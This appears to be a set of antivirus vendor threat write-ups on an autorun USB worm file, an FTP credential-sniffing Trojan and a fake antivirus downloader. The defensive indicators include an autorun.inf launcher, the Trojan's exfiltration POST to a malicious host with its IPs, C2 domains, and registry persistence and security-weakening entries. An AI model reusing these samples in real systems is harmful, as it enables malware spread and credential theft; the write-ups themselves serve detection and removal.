Threat Spotlight

Threat Name:

Users at Risk:

Windows users with removable storage devices

Also Known As:

• McAfee: Generic!atr

Further Reading:

• The cost of True Love
• How to disable the Autorun functionality in Windows (Microsoft)

Removal Instructions:

If you believe you have been infected, please follow these instructions for removing generically detected files.

About:

Mal/AutoInf-A is a malicious file usually found on USB drives or other removable storage devices, such as iPods or memory cards for cameras. The presence of Mal/AutoInf-A is indicative a worm infection, since worms are the most common means for this malware to spread from one computer to another.

To infect a new computer, first an uninfected removable storage device needs to be plugged into a machine that is infected with both Mal/AutoInf-A and a worm. The worm creates a copy of Mal/AutoInf-A on the device, usually in a file named autorun.inf. This file will usually be marked as hidden, system and read-only in order to protect it from easy detection and deletion.

After copying malware to the removable device, the worm will then create a copy of itself on the device.

When the infected removable device is connected to a computer with the 'auto insert notification' feature enabled—as it is by default—Windows will search the device's root directory for the presence of an autorun.inf file. If present, Windows then proceeds to read the file and execute its instructions. In the case of Mal/AutoInf-A, this will usually be:

[AutoRun]
open=worm.exe
shellexecute=worm.exe
shell\Auto\command=worm.exe
shell=Auto

—where "worm.exe" is the name of the specific malware in question.

This is how the worm takes advantage of the Windows Autorun feature to ensure it will execute whenever the infected device connects to a new computer.

Once the worm starts running, it copies itself to Windows system folders. When a new removable storage device connects to the computer, the worm replicates itself in the method described above.

In order effectively to remove all of the components of a Mal/AutoInf-A infection, you need to remove both the Mal/AutoInf-A file and the associated executable that created it. Removing Mal/AutoInf-A itself alone will not resolve the infection.

Threat Name:

Users at Risk:

Windows users

Further Reading:

• Fake AV—why I want your FTP credentials
• New fake AV threats on the prowl

Removal Instructions:

Please follow these instructions for removing Trojans.

About:

Troj/Sniffer-R is a malicious file that "sniffs" FTP credentials, meaning it monitors users' network traffic to steal and report users' FTP credentials to a remote site. This Trojan is somewhat unusual in that it only sniffs plain-text FTP traffic via port 21—secure FTP (SFTP) would not be sniffed.

This Trojan is often dropped to the following location:

<Progam Files>\Common Files\file.exe

and copies itself to one of the following locations:

<Application Data>\Microsoft\Windows\winlogon.exe
C:\Program Files\Microsoft\winlogon.exe

Troj/Sniffer-R then creates the following registry entry so that it runs automatically on startup:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows logon process
<path to Trojan>

After sniffing network traffic for FTP credentials, the Trojan pushes the stolen information to these hard-coded IP addresses:

"91.203.93.23"
"70.87.136.2"

—which, at the time of original analysis, resolved to the known malicious site "addded.com," though it now resides at different IP addresses (see note below). This malicious site is actually used in the POST request:

POST /cgi-bin/check.pl HTTP/1.1
Host: addded.com
Content-Length: %d
Connection: close
%s

—where the variables %d and %s are filled in when the data is pushed.

Troj/Sniffer-R is sometimes dropped by Fake AV, Troj/FakeAv-AAL in particular.

The packer code used to obfuscate Troj/Sniffer-R has much in common with the TDSS family of malware. Sophos detects variants of this file as Mal/TDSSPack-Q and Mal/TDSSPack-R. The code-obscuring characteristics include fake exports that are placed randomly in the middle of other functions, as well as extreme repeated use of extended operations—in this case, floating point operations using XMM registers.

Note: As with many Fake AV pushers, the malicious domain to record sniffed credentials has already shifted the IP addresses for "addded.com." Notably, the time to live (TTL) for the DNS record on "addded.com" is short—only 60 seconds. By comparison, a common TTL value is 86400 seconds, or 24 hours.

Threat Name:

Users at Risk:

Windows users

Also Known As:

• Kaspersky: Backdoor.Win32.UltimateDefender.yw
• Avira: TR/Dldr.FraudLoad.51200
• Symantec: Trojan.Virantix.C
• Trend: TROJ_FAKEAV.CVA
• Microsoft: Trojan:Win32/Wantvi.I

Removal Instructions:

Please follow these instructions on removing Trojans.

About:

Troj/Dldr-BL includes functionality to access the internet and communicate with the following remote servers via HTTP:

uplaserdunavats.com
opolertionfer.com
nuherfodaverta.com
gumertagionader.com
celiminerkariota.com

When first run, Troj/Dldr-BL fires on Host Intrusion Prevention System (HIPS) detection "HIPS/FileMod-004" and "HIPS/FileMod-007," and then copies itself to the following locations:

<Windows>\braviax.exe
<System>\braviax.exe

When those executables are run, the following files are created and can be safely deleted:

<User>\Application Data\Microsoft\Internet Explorer\Quick Launch\AntivirusPro_2010.lnk
<Desktop>\AntivirusPro_2010.lnk
<Start Menu\Programs>\AntivirusPro_2010\AntivirusPro_2010.lnk
<Start Menu\Programs>\AntivirusPro_2010\Uninstall.lnk
<Program Files>\AntivirusPro_2010\Microsoft.VC80.CRT\msvcm80.dll
<Program Files>\AntivirusPro_2010\Microsoft.VC80.CRT\msvcp80.dll
<Program Files>\AntivirusPro_2010\Microsoft.VC80.CRT\msvcr80.dll
<Program Files>\AntivirusPro_2010\pthreadVC2.dll

The Trojan also creates these malware files:

<Program Files>\AntivirusPro_2010\AntivirusPro_2010.exe (detected as Mal/EncPk-IF)
<Program Files>\AntivirusPro_2010\AVEngn.dll (detected as Mal/EncPk-IF)
<Program Files>\AntivirusPro_2010\htmlayout.dll (detected as Mal/EncPk-IF)
<Program Files>\AntivirusPro_2010\Uninstall.exe (detected as Mal/EncPk-IF)
<Program Files>\AntivirusPro_2010\wscui.cpl (detected as Mal/EncPk-IF)
<Windows>\cru629.dat (detected as Mal/TibsPak, Mal/EncPk-BB and Mal/EncPk-A)
<System>\cru629.dat (detected as Mal/TibsPak, Mal/EncPk-BB and Mal/EncPk-A)
<System>\wisdstr.exe (detected as Mal/EncPk-IF)
<System>\dllcache\figaro.sys (detected as Mal/FakeAle-C)

The following registry entries are created to run AntivirusPro_2010.exe and braviax.exe on startup:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run braviax
<System>\braviax.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run braviax
<System>\braviax.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Antivirus Pro 2010
<Program Files>\AntivirusPro_2010\AntivirusPro_2010.exe" /hide

Registry entries are then set as follows:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
ForceClassicControlPanel
1

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
LowRiskFileTypes
zip;.rar;.cab;.txt;.exe;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mov;.mp3;.wav

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
SaveZoneInformation
1

HKCU\Software\Microsoft\Internet Explorer\Main
Enable Browser Extensions
yes

HKCU\Software\Microsoft\Internet Explorer\Download
RunInvalidSignatures
1

These registry entries are created under:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AntivirusPro_2010\
HKCU\Software\Microsoft\Security Center\
HKLM\SOFTWARE\AntivirusPro_2010\